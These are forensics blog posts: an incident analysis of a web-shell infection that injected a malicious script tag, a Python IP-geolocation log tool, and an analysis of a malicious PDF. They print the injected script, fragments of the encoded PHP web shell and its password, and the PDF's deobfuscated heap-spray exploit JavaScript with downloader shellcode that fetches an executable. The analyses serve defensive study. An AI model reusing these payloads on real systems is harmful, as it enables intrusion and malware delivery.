Channel: Ghetto Forensics

Analysis of Web-based Malware Attack

Any website on the Internet will eventually be targeted by an attack. WordPress and other blog sites are notoriously targeted with infections that inject code into HTML files, pointing visitors to malicious or advertisement websites. My website was similarly affected last month. Here is how the issue was identified and rectified within a few minutes of notification.

The first alert came by way of Twitter, when a friend told me that my site was redirecting somewhere else. I was sitting at my desk and quickly opened the site to verify. Sure enough, it was:

Malware infection shown to visitors


I SSH'd into the system and immediately changed the password. I then started looking for the culprit. The main file that was causing the redirection was named 'books.htm' and was in my web root folder. This was a simple HTML page that just lists the book projects I've worked on.

The first thing I did was manually view the file to see the impact. There was an added line of code to the very beginning of the file:
    <script src="http://globalpoweringgathering.com/nl.php?p=1"></script>\n
With the infection spotted, I checked the file's MAC times to see when the attack occurred:

    $ stat books.htm
    File: `books.htm'
    Size: 1500      Blocks: 8          IO Block: 4096   regular file
    Device: 811h/2065d Inode: 275324414   Links: 1
    Access: (0664/-rw-rw-r--)  Uid: (10369090/ bbaskin)   Gid: (45673/pg144238)
    Access: 2010-07-19 07:10:46.000000000 -0700
    Modify: 2011-04-02 23:35:38.000000000 -0700
    Change: 2011-04-02 23:35:38.000000000 -0700
The stat output shows that the file was modified and changed on April 2nd at 11:35 PM. This is just one file, so we need to compare against another file to verify the date and time. A quick spot check showed an additional HTM file with the infection:


    $ stat faq.htm
    File: `faq.htm'
    Size: 143       Blocks: 8          IO Block: 4096   regular file
    Device: 811h/2065d Inode: 275322846   Links: 1
    Access: (0644/-rw-r--r--)  Uid: (10369090/ bbaskin)   Gid: (45673/pg144238)
    Access: 2010-02-25 20:37:47.000000000 -0800
    Modify: 2011-04-02 23:35:38.000000000 -0700
    Change: 2011-04-02 23:35:38.000000000 -0700
A spot check across other folders showed similar infections. A grep for "globalpower" showed that it only infected .htm and .html files. I then ran the following script to search for the infection code and remove it.
    grep -Rl "globalpower" * | xargs sed -i 's|<script src="http://globalpoweringgathering.com/nl.php?p=1"></script>\\n||g'
Broken down: grep finds the infected files and passes each filename to sed. Sed then does a global find and replace (s/old/new/g). Since the search string itself contains a '/', I used '|' as the sed delimiter instead. This looks for the infection code and replaces it with nothing, thus removing it.
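The same cleanup can be sketched in Python for anyone who would rather do a dry run before rewriting files. This is only an illustration, not the command I actually ran: the function names are made up for the example, and treating the trailing literal "\n" as optional is an assumption.

```python
import os

# The injected tag as shown above. The trailing two characters "\n"
# (a literal backslash and "n") are treated as optional; that is an assumption.
TAG = '<script src="http://globalpoweringgathering.com/nl.php?p=1"></script>'


def strip_injection(text):
    """Return text with every copy of the injected tag removed."""
    return text.replace(TAG + "\\n", "").replace(TAG, "")


def clean_tree(root, dry_run=True):
    """List infected .htm/.html files under root; rewrite them unless dry_run."""
    infected = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".htm", ".html")):
                continue
            path = os.path.join(folder, name)
            # newline="" keeps the original line endings untouched
            with open(path, encoding="utf-8", errors="surrogateescape", newline="") as fh:
                original = fh.read()
            cleaned = strip_injection(original)
            if cleaned != original:
                infected.append(path)
                if not dry_run:
                    with open(path, "w", encoding="utf-8", errors="surrogateescape", newline="") as fh:
                        fh.write(cleaned)
    return infected
```

Calling `clean_tree(".")` only reports the infected files; `clean_tree(".", dry_run=False)` rewrites them. Either way, rewriting a file resets its modify time, so collect the stat output first.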

Now that we have a known date and time, and assuming that this is not a stomped date, we can focus on the network logs to see what occurred during that time. When reviewing the Apache logs I found the following two lines that were the sole activity during that time.
    66.96.128.62 - - [02/Apr/2011:23:35:32 -0700] "POST /main.1.5.back/tmp/aarika_friend.php HTTP/1.1" 200 162 "-""-"
    66.96.128.62 - - [02/Apr/2011:23:35:37 -0700] "POST /main.1.5.back/tmp/aarika_friend.php HTTP/1.1" 200 433 "-""-"
These lines show the offending IP address and verify the date and time but, more importantly, show the initial malware script that caused the problems. They also show two consecutive connections, five seconds apart. The first connection sent 162 bytes of data back to the attacker and the second sent 433 bytes. The file still existed on the system. I gathered the file's inode data, shown below, and then renamed the file and chmod'd it to 400 (r--------) to prevent any additional execution. At this point the date sank in. February 24th? The timestamps could be stomped, or the file really could have been uploaded at that point. My access logs do not go that far back, so I have to assume the worst.
    $ stat aarika_friend.php
    File: `aarika_friend.php'
    Size: 28278     Blocks: 56         IO Block: 4096   regular file
    Device: 811h/2065d Inode: 113164428   Links: 1
    Access: (0644/-rw-r--r--)  Uid: (10369090/ bbaskin)   Gid: (45673/pg144238)
    Access: 2011-02-24 00:31:36.000000000 -0800
    Modify: 2011-02-24 00:31:36.000000000 -0800
    Change: 2011-02-24 00:31:36.000000000 -0800
This PHP file was encoded into an unreadable format that we'll touch on later. For now, the hole needs to be patched. The first big issue I see is that the file exists within a folder called "/main.1.5.back/tmp". When I was doing some obscure testing over a year ago I set the tmp folder in my Joomla installation to 777 permissions, then neglected to reset them. Worst. Mistake. Ever. When I performed a major Joomla update on December 31, 2010, I copied the entire directory to a backup and created a new one. This wide-open directory sat there for months. How did the file end up in that particular location? I don't know at this point. I changed the permissions on the folder for now, and also checked all other folders to ensure that none were left open.
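To see if any other files were touched, I scanned my folder tree for any file modified (mtime) or changed (ctime) within the last 90 days. The leading minus matters: "-90" means "less than 90 days ago", while a bare "90" matches only files touched exactly 90 days ago.
    $ find ./ -mtime -90
    $ find ./ -ctime -90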
This search did not uncover any additional files.
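For a forensic workstation without find, a rough Python equivalent of that sweep is sketched below. The function name and the 90-day default are illustrative only, and note that on Windows st_ctime is the creation time rather than the inode change time.

```python
import os
import time


def recently_touched(root, days=90, now=None):
    """Return (path, mtime, ctime) for files modified or changed in the last `days` days."""
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    hits = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            st = os.lstat(path)  # lstat: do not follow symlinks
            if st.st_mtime >= cutoff or st.st_ctime >= cutoff:
                hits.append((path, st.st_mtime, st.st_ctime))
    # Newest activity first
    return sorted(hits, key=lambda h: max(h[1], h[2]), reverse=True)
```

Sorting by the newer of the two timestamps puts the most recent activity at the top, which is usually where the interesting files are.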

It was an embarrassing hit, but I did eventually clean the system up. From point of notification to remediation was about 10 minutes. And at least I hold no PII on the server ;)

Malware analysis

For the time being, I kept a copy of the infected files. They were moved outside of the public web folder to a place where I could analyze them later. I focused on aarika_friend.php and copied the code to a VM environment running Linux. This file included the following data (some portions reduced for obvious reasons):

    <?php $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_8bb1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_8b7b1f56=$_8b7b(""$_8b7b1f("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ7MjUzOzI1MzsyMjQ7
    ...
    CgkbSBhcyAkdilpZiAoJHYhPSIiKSR6Lj1jaHIoJHZeJGspO2V2YWwoJHopOw=="));$_8b7b1f56();?
Looking at the low-ASCII structure of the data, and the trailing "==", it's easy to see this is Base64 encoded. I then removed the header up to the "JGs9..." and the tail after "==" and ran it through a Base64 decoder. It resulted in the following data (again, some portions removed)
    $k=143;$m=explode(";","234;253;253;224;253;208;253;234;255;
    ...
    175;175;175;242;130;133;242;175;");$z=""; foreach($m as $v) if ($v!="") $z.=chr($v^$k); eval($z);
The explode() and chr() PHP functions here are the key. Notice the first variable is $k=143. explode() splits the string on the semicolons into a list of 3-digit numbers; the foreach loop then XORs (^) each number with 143 and converts the result to an ASCII character (chr($v^$k)). We can check this manually with the first five numbers:

    $ php -r 'echo(chr(234^143).chr(253^143).chr(253^143).chr(224^143).chr(253^143)."\n");'
    error

Now we know that we're seeing appropriate ASCII text. The foreach() command goes through each 3-digit number, converts it to an ASCII character, and appends it to a master variable string called $z. At this point I'm going to edit the code to remove the very last command: eval($z);
Instead, I'll replace it with:
    $bb=fopen('malware.txt','w');fwrite($bb,$z);fclose($bb);
I then add the necessary PHP header and footer to the file: "<?php " and "?>"
After making the edits I double check, then triple check, to ensure that I removed the eval() statement. Then I run:
    php -f aarika_friend.decoded.php
It creates a new output called 'malware.txt' which contains the raw code. Rather than display it here, I'll point you to a pastebin archive of the code.  Pastebin gives a safe environment to view the code while performing syntax highlighting to make it easier to read.
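If editing and running the malware's own PHP makes you nervous, the two layers can also be undone statically. The Python below is a minimal sketch under the assumption that the first stage always looks like the `$k=...;$m=explode(";","...")` snippet shown above; the function name is mine and nothing here ever executes the PHP.

```python
import base64
import re


def decode_stage2(stage1_b64):
    """Base64-decode the payload, then undo the chr($v ^ $k) loop without eval()."""
    stage1 = base64.b64decode(stage1_b64).decode("latin-1")
    # XOR key, e.g. $k=143;
    key = int(re.search(r"\$k=(\d+);", stage1).group(1))
    # The semicolon-separated number list passed to explode()
    numbers = re.search(r'explode\(";","([0-9;\s]*)"\)', stage1).group(1)
    return "".join(chr(int(n) ^ key) for n in numbers.split(";") if n.strip())
```

Feed it the Base64 text between the quotes (from "JGs9..." through the trailing "==") and write the returned string to malware.txt. As a quick check, the first five numbers (234, 253, 253, 224, 253) XORed with 143 spell "error", matching the php -r test earlier.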
So let's analyze a bit of what's going on in this code. By looking solely at the HTML sections we can see a basic web structure in place. The script creates two boxes, Check (p) and cmd. The attacker types a command into the cmd box and a verification phrase into the Check box.
Before executing the command the code first looks to see if the check phrase, stored as a variable named 'p', is correct.

  • if (md5($_COOKIE["p"]) !="ca3f717a5e53f4ce47b9062cfbfb2458") {


If the MD5 hash of the phrase matches the value above then the specified command executes. The verification value that matches that MD5? It's "showmustgoon!"

    $ echo -n showmustgoon! | md5sum
    ca3f717a5e53f4ce47b9062cfbfb2458  -
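The same gate is easy to mimic in Python when testing candidate phrases from a wordlist. This is just a sketch of the comparison the web shell performs; the function name is hypothetical.

```python
import hashlib

# Hash hard-coded in the web shell's cookie check
SHELL_MD5 = "ca3f717a5e53f4ce47b9062cfbfb2458"


def cookie_passes(phrase, expected_md5=SHELL_MD5):
    """Return True if md5(phrase) equals the expected hex digest."""
    return hashlib.md5(phrase.encode("utf-8")).hexdigest() == expected_md5
```

Looping `cookie_passes()` over a wordlist is all it takes to test guesses against an unsalted MD5 like this one.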

At this point, the rest is just an academic exercise. The exploit was found, the vulnerability was found, and all was remediated. It turned into a learning lesson for me and hopefully for you as well.


Geolocational Log Analysis: Think Globally, Act Locally


In many network environments the administrators and security engineers have an understanding of the full geographical scope and reach of their network. While some corporations have a global audience and expect traffic from the far reaches of the world, others are more localized and target a specific small region.

A health care provider for Alaska would monitor its network to ensure that connections are limited to its main source of users, i.e. those in Alaska. An insurance company in St. Louis will see traffic mostly from IP addresses in Missouri, but from Illinois as well, due to the city being on the state line.

Occasionally, administrators may notice connections being made from Hawaii, Bermuda, or Italy, signifying users who are on vacation but are still wired in to their work. However, a long-term series of connections from a subscriber of Eircom, Ireland's largest ISP, should spark the interest of the network administrator of a Seattle tax firm.

While anonymous web connections from global addresses are common, specific attention should be paid to such addresses being used to access password-protected areas of a corporation. This could include remote file access, VPN and web-based corporate email.

In such cases the logs from these applications, usually supplied in plain text or W3C format, contain details about each transaction, including the remote IP address and the account name being authorized. In reviewing logs from various incident responses, cmdLabs has found that a short daily log review could help smaller corporations quickly determine whether a user account was compromised and accessed from a remote location.

For example, the log sample below from a Cisco ASA tracks VPN connections. The account "cmdLabs\bbaskin" was accessed from the IP address 159.134.100.100 on 2 April 2011, an IP that traced back to Ireland. A few hours later the same account was accessed from an IP address in Austria.


Apr  2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-302013: Built outbound TCP connection 7823 for inside:10.10.10.50/389 (10.10.10.50/389) to NP Identity Ifc:192.168.1.1/1047 (192.168.1.1/1047)
Apr  2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-113004: AAA user authentication Successful : server =  10.10.10.50 : user = cmdLabs\bbaskin
Apr  2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-113009: AAA retrieved default group policy (DfltGrpPolicy) for user = cmdLabs\bbaskin
Apr  2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-113008: AAA transaction status ACCEPT : user = cmdLabs\bbaskin
Apr  2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-734001: DAP: User cmdLabs\bbaskin, Addr 159.134.100.100, Connection Clientless: The following DAP records were selected for this connection: DfltAccessPolicy


For this small set of data it is trivial to query each IP address to determine its country of origin, netblock owner, and other details that would highlight unauthorized access. The problem arises when you have hundreds of thousands of such transactions in your daily log files.
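As a starting point for that kind of bulk review, the 734001 records can be reduced to a map of account to source addresses. The sketch below is an illustration only: the regular expression is based solely on the sample line above, and the function name is made up.

```python
import re
from collections import defaultdict

# Matches the DAP record shown above: "... DAP: User <name>, Addr <ip>, ..."
DAP_LOGIN = re.compile(
    r"%ASA-6-734001: DAP: User (?P<user>[^,]+), Addr (?P<addr>[0-9.]+),"
)


def logins_by_user(lines):
    """Map each account name to the set of remote addresses it logged in from."""
    seen = defaultdict(set)
    for line in lines:
        match = DAP_LOGIN.search(line)
        if match:
            seen[match.group("user")].add(match.group("addr"))
    return dict(seen)
```

An account that shows up with addresses in two different countries within a few hours, like the Ireland and Austria example, is the pattern worth flagging.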




One service that cmdLabs uses regularly is the IP to ASN WHOIS server run by Team Cymru. This server provides quick and easy access to country codes for a given IP address. However, it has two limitations: it requires Internet access, which is not readily available from a forensic workstation, and to process a large batch of IPs you have to use their Netcat interface, which returns only ASNs and not country codes. To overcome these limitations I've developed a simple solution that can process hundreds of thousands of IP addresses to determine country codes.

This solution is a small Python script called IP2CC that takes an IP address as input and outputs the originating country code for that IP. This solution requires three components:
  1. The free country code database located at http://www.maxmind.com/app/geolitecountry (updated monthly)
  2. Python API module to access this database located at https://github.com/appliedsec/pygeoip
  3. The ip2cc.py script. Downloadable at the end of this blog post.
The script allows for input to be given via the command line, stdin, or an input file. In normal use it will simply output the country code. With the -c or -t option the output will contain both the IP and country code in either comma-separated (CSV) or tab-separated (TSV) form, respectively.

    python ip2cc.py -i <ip> -f <input file> [-c] [-t]

    > python ip2cc.py -i 11.11.11.11
    US
    > python ip2cc.py -i 22.22.22.22 -c
    22.22.22.22,US
    > echo 33.33.33.33 | python ip2cc.py
    US
    > python ip2cc.py -f IP.txt -c
    14.48.7.101,AU
    12.51.21.19,US
    10.61.14.9,Internal
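To give a feel for the logic without reproducing the real ip2cc.py, here is a minimal Python 3 sketch. It is not the downloadable script: the country lookup is passed in as a function so the example stays self-contained, the names are hypothetical, the "Invalid" and "Unknown" labels are my own invention, and using `ipaddress.is_private` to decide what counts as "Internal" is an assumption.

```python
import ipaddress


def ip_to_cc(ip, lookup):
    """Return a country code for ip, or 'Internal' for private address space."""
    try:
        addr = ipaddress.ip_address(ip.strip())
    except ValueError:
        return "Invalid"  # hypothetical label, not from the original script
    if addr.is_private:
        return "Internal"
    return lookup(str(addr)) or "Unknown"  # "Unknown" is also hypothetical


def format_rows(ips, lookup, sep=None):
    """Yield one output line per IP: the bare code, or 'ip<sep>code' when sep is set."""
    for ip in ips:
        ip = ip.strip()
        if not ip:
            continue
        code = ip_to_cc(ip, lookup)
        yield code if sep is None else f"{ip}{sep}{code}"
```

Passing `sep=","` or `sep="\t"` mirrors the -c and -t options. With the pygeoip module listed above, the lookup would presumably be something like `pygeoip.GeoIP("GeoIP.dat").country_code_by_addr`, but treat that call as an assumption and check it against the module's documentation.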


In one use, we'll eliminate known intranet/extranet IP addresses and run the resulting list through IP2CC to produce a master list of foreign accesses. This script will run in Linux and OS X in conjunction with the native OS command line tools. For a Windows environment you will find additional capabilities by installing the necessary GnuWin32 components. For example, when reviewing an NCSA-formatted log with the IP address in the first field:
    D:\> type in051611.log | egrep -v "^192" | gawk "{print $1}" | python ip2cc.py -t | egrep -v "US|Internal" | gawk -F\t "{print $1}" | sort | uniq > DailyForeignIPs.txt
    D:\> for /F %i in (DailyForeignIPs.txt) do grep "%i" in051611.log >> DailyForeignConnections.txt
The first command above will save a simple text listing of all unique foreign IP addresses into a file for processing. The second line takes each IP address from that resulting file and compares it back against the logs to extract all lines that include its presence. The resulting DailyForeignConnections.txt can then be quickly reviewed to determine if any accounts were accessed from a foreign IP address.

Dealing with the VPN logs shown earlier, we'll change our command line a bit. Using the standard Cisco log message index as a source we can see that the log ID 734001 will show us the remote IP address of a user login. We'll search the log for that ID and then parse out the IP address in the 15th field. An additional hindrance is that the IP address has a trailing comma, which we'll remove with the 'tr' command.
    D:\> type asavpn-051611.log | findstr "734001" | gawk "$15 !~ /^192/ {print $15}" | tr -d "," | python ip2cc.py -t | egrep -v "US|Internal" | sort | uniq > DailyVPNForeignIPs.txt
This is ultimately just a very simple Python script. In-house, we use it as a mere function within larger processes, but its simplicity allows it to be used in a variety of result-tuning processes. Customization is easy. At times I'll make an offshoot of the script to process input from the `uniq` command with its `-c` count option. `uniq -c` adds a new column that gives the total number of instances of each IP address, which is useful when evaluating the persistence of a single IP amongst thousands. A few small changes to the Python will allow you to read this count and add it to the CSV output for easy integration into a spreadsheet.
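One way such an offshoot might look is sketched below. It assumes `uniq -c` lines of the form "count, whitespace, IP" and, as before, takes the country lookup as a parameter; the function names are illustrative and not part of the released script.

```python
def parse_uniq_c(line):
    """Split a 'uniq -c' line such as '      3 159.134.100.100' into (ip, count)."""
    count, ip = line.split(None, 1)
    return ip.strip(), int(count)


def rows_with_counts(lines, lookup):
    """Return 'ip,country,count' CSV rows, most frequent IP first."""
    parsed = [parse_uniq_c(line) for line in lines if line.strip()]
    parsed.sort(key=lambda item: -item[1])  # stable sort keeps ties in input order
    return [f"{ip},{lookup(ip)},{count}" for ip, count in parsed]
```

Sorting by count puts the most persistent addresses at the top of the spreadsheet, which is usually where the review should start.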

Usage of a tool like IP2CC is a first step toward opening an administrator's eyes to traffic beyond their network. A good administrator or security engineer should monitor not only the traffic that flows across their network but also how that network appears from the Internet side. Monitoring for your company's presence on spam blacklists, a malware rating on services like Web of Trust, and other indicators can give clues that an infection or intrusion may be underway within your network.

Downloads:
IP2CC Python Source Code v1.0

Malicious PDF Analysis: Reverse code obfuscation

I normally don't find the time to analyze malware at home, unless it is somehow targeted towards me (like the prior write-up of an infection on this site). This last week I received a very suspicious PDF in an email that made it through GMail's spam filters and grabbed my attention.

The email arrived in the inbox of my Google Mail account. It was easily accessible at first, but within two days Google did alert on the virus in the attachment and prevented downloading it. The email had one attachment, 92247.pdf, which could still be obtained as Base64 when viewing the email in its raw form.

A quick view in a hex editor showed that the file, only 13,205 bytes in size, included no obvious dropper, decoy, or even displayable PDF data. There was just one object of note, that contained an XML subform with embedded JavaScript. Boring...

Upon examining the JavaScript, I saw a large block of data that would normally contain the shell code, or even further JavaScript, to attack the victimized system. However, this example proved odd. There was a large block of such data (abbreviated below), but it contained all integer numbers that were between 0 and 74. This is not standard shell code.

    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';

So I started looking at the surrounding code:



    8 0 obj <</Length 325325>> stream <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
    <asd/>as<config xmlns='123'><asd/>
    <xdp:present>
    <pdf>
    <xdp:interactive>1</xdp:interactive>
    <int>0</int>
    a
    <asd/>a<version>1.5</version>
    a<asd/>
    </pdf>
    </xdp:present>
    <asd/></config><asd/>
    <template xmlns='http://www.xfa.org/schema/xfa-template/2.5/'>
    <asd/>
    a<subform name="a1"> <pageSet>
    <pageArea id="roteYom" name="roteYom">
    <contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
    <medium long="792pt" short="612pt" stock="default"/>
    </pageArea>
    </pageSet>
    <asd/>a
    <subform name='v236536b346b'>
    a<asd/>a<field name='qwe123b'>a<asd/>a<event activity='initialize'>
    <script contentTyp='application'
    contentType='application/x-javascript'>
    x='e';
    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';
    cc={q:"var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"}.q;

    q=x+'v'+'al';
    a=(Date+String).substr(2,3);
    aa=([].unshift+[].reverse).substr(2,3);
    if (aa==a){
    t='3vtwe';
    e=t['substr'];
    w=e(12)[q];
    s=[];
    ar=arr.split('@');
    n=cc;
    for(i=0;i<ar.length;i++){
    s[i]=n[ar[i]];
    }
    if(a===aa)w(s.join(''));
    }
    </script>a
    </event><ui>
    <imageEdit/>
    </ui>
    </field>
    </subform>
    </subform><Gsdg/>a</template>a<asd/>a<xfa:datasets a='a' xmlns:xfa='http://www.xfa.org/schema/xfa-data/1.1' b='b'>
    <xfa:data><a1 test="123">
    </a1>
    </xfa:data>
    </xfa:datasets>
    </xdp:xdp>
    endstream
    endobj
The first few things that popped out were obfuscated / escaped variable names. You can see a reference to "n" but nowhere is it initialized. Instead, you see variables named "& # 000119;" and "& # 000110;". These are the ASCII decimal values for "w" and "n" respectively. Additionally, operators like "<" are escaped as the HTML entity "& lt;". The big thing we look for is the "eval()" statement, and it is equally obfuscated as: x='e'; q=x + 'v'+'al';, making q = "eval".

But what about that large block of data? And what is up with that unusual "cc" variable that contains a large list of characters? By analyzing the decoding "for" loop, you can see the meaning. The "cc" is actually the custom character set of the end result, and the large data block "arr" is a series of numbers that each index one character in that set, separated by "@".

With this configuration, you can visually analyze the first few pointers:
0@1@2@3@4@1@5@5@6@7@8@9 equals "var padding;". Bingo. But even with this layer of obfuscation, a quick Python script makes short work of it:
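    # Index string from the PDF (abbreviated here)
    arr = '0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@11@3@5@5@28@30@28@28@9'
    # Custom character set that each index points into
    cc = "var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"
    # Look up every index and rebuild the hidden script
    result = "".join(cc[int(i)] for i in arr.split("@"))
    print(result)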
When run, voila! Our obfuscated code:
    var padding;var bbb, ccc, ddd, eee, fff, ggg, hhh;var pointers_a, i;var x = new
    Array();var y = new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a302
    0824a6e2f804a41414141260000000000000000000000000000001239804a6420600f00040000414
    14141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0
    374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f
    5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e240
    3dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf
    38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1
    083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5
    c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c
    7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00f
    f561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c
    46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f706874747
    03a2f2f757262616e2d676561722e636f6d2f3430345f706167655f696d616765732f303230362e6
    578650000";var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141
    4141260000000000000000000000000000007188804a6420600f0004000041414141414141416683
    e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ff
    ffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c9
    4941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ec
    ff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559
    e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
    00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc70424726567
    73c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7
    441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a00
    53ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e8
    9cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f757262616e
    2d676561722e636f6d2f3430345f706167655f696d616765732f303230362e6578650000";_l3=ap
    p;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.re
    place('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_
    l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _
    I0(_I1){_I1=unescape(_I1);roteDak=_I1.length*2;dakRote=unescape('%u9090');spray=
    _l7(dakRote,0x2000-roteDak);loxWhee=_I1+spray;loxWhee=_l7(loxWhee,524098);for(i=
    0; i < 400; i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote;}function _I2(
    _I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(
    _I1){ret='';for(i=0;i<_I1.length;i+=2){b=_I1.substr(i,2);c=parseInt(b,16);ret+=S
    tring.fromCharCode(c);}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I
    1.length;_I6++){_l9=_I4.length;_I7=_I1.charCodeAt(_I6);_I8=_I4.charCodeAt(_I6%_l
    9);_I5+=String.fromCharCode(_I7^_I8);}return _I5}function _I9(_I6){_j0=_I6.toStr
    ing(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5=
    '';for(_I6=0;_I6<_I1.length;_I6+=2){_I5+='%u';_I5+=_I9(_I1.charCodeAt(_I6+1));_I
    5+=_I9(_I1.charCodeAt(_I6))}return _I5}function _j3(){_j4=_l5();if(_j4<9000){_j5
    ='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_j6=_l1;_j7=
    _I3(_j6)}else{_j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE
    4BK';_j6=_l2;_j7=_I3(_j6)}_j8='SUkqADggAABB';_j9=_I2('QUFB',10984);_ll0='QQcAAAE
    DAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwE
    EAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';_ll1=_j8+_j9+_ll0+_j5;_ll2=_ji1(_
    j7,'');if(_ll2.length%2)_ll2+=unescape('');_ll3=_j2(_ll2);with({k:_ll3})_I0(k
    );qwe123b.rawValue=_ll1}_j3();
With this type of output, I would typically use Malzilla to clean it up for exploit analysis. But, with the shell code in plain sight, I'll go right for the payload. There are actually two copies of the shell code, stored as "_l1" and "_l2", with a few slight differences between the two. The code is actually binary data stored as plaintext hex, where every two characters represent the hexadecimal value of one byte. Copying and pasting the data into a hex editor will convert it to binary.
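If a hex editor isn't handy, the conversion is a one-liner in Python, and a crude strings pass over the result already surfaces the readable parts. This is a sketch for illustration; the function names and the six-character minimum are arbitrary choices of mine.

```python
import binascii
import re


def hex_to_bytes(hex_text):
    """Convert plaintext hex (whitespace and line breaks allowed) to raw bytes."""
    return binascii.unhexlify("".join(hex_text.split()))


def ascii_strings(data, min_len=6):
    """Return runs of printable ASCII at least min_len characters long."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]
```

Running `ascii_strings(hex_to_bytes(...))` over the contents of `_l1` should surface the download URL without ever opening a debugger.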

Now, normally you would look for shellcode obfuscation and API resolutions with IDA Pro or a debugger like Immunity/OllyDbg, but this one is pretty straightforward. It's a simple downloader with the URL in plain text (similar to a sample I demonstrated to TV's David McCallum... just saying ;)). When I view the data in my favorite free hex editor, HxD, I can see:
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 4C 20 60 0F 05 17 80 4A 3C 20 60 0F 0F 63 80 4A L `...€J< `..c€J
    00000010 A3 EB 80 4A 30 20 82 4A 6E 2F 80 4A 41 41 41 41 £ë€J0 ‚Jn/€JAAAA
    00000020 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &...............
    00000030 12 39 80 4A 64 20 60 0F 00 04 00 00 41 41 41 41 .9€Jd `.....AAAA
    00000040 41 41 41 41 66 83 E4 FC FC 85 E4 75 34 E9 5F 33 AAAAfƒäüü…äu4é_3
    00000050 C0 64 8B 40 30 8B 40 0C 8B 70 1C 56 8B 76 08 33 Àd‹@0‹@.‹p.V‹v.3
    00000060 DB 66 8B 5E 3C 03 74 33 2C 81 EE 15 10 FF FF B8 Ûf‹^<.t3,.î..ÿÿ¸
    00000070 8B 40 30 C3 46 39 06 75 FB 87 34 24 85 E4 75 51 ‹@0ÃF9.uû‡4$…äuQ
    00000080 E9 EB 4C 51 56 8B 75 3C 8B 74 35 78 03 F5 56 8B éëLQV‹u<‹t5x.õV‹
    00000090 76 20 03 F5 33 C9 49 41 FC AD 03 C5 33 DB 0F BE v .õ3ÉIAü..Å3Û.¾
    000000A0 10 38 F2 74 08 C1 CB 0D 03 DA 40 EB F1 3B 1F 75 .8òt.ÁË..Ú@ëñ;.u
    000000B0 E6 5E 8B 5E 24 03 DD 66 8B 0C 4B 8D 46 EC FF 54 æ^‹^$.Ýf‹.K.FìÿT
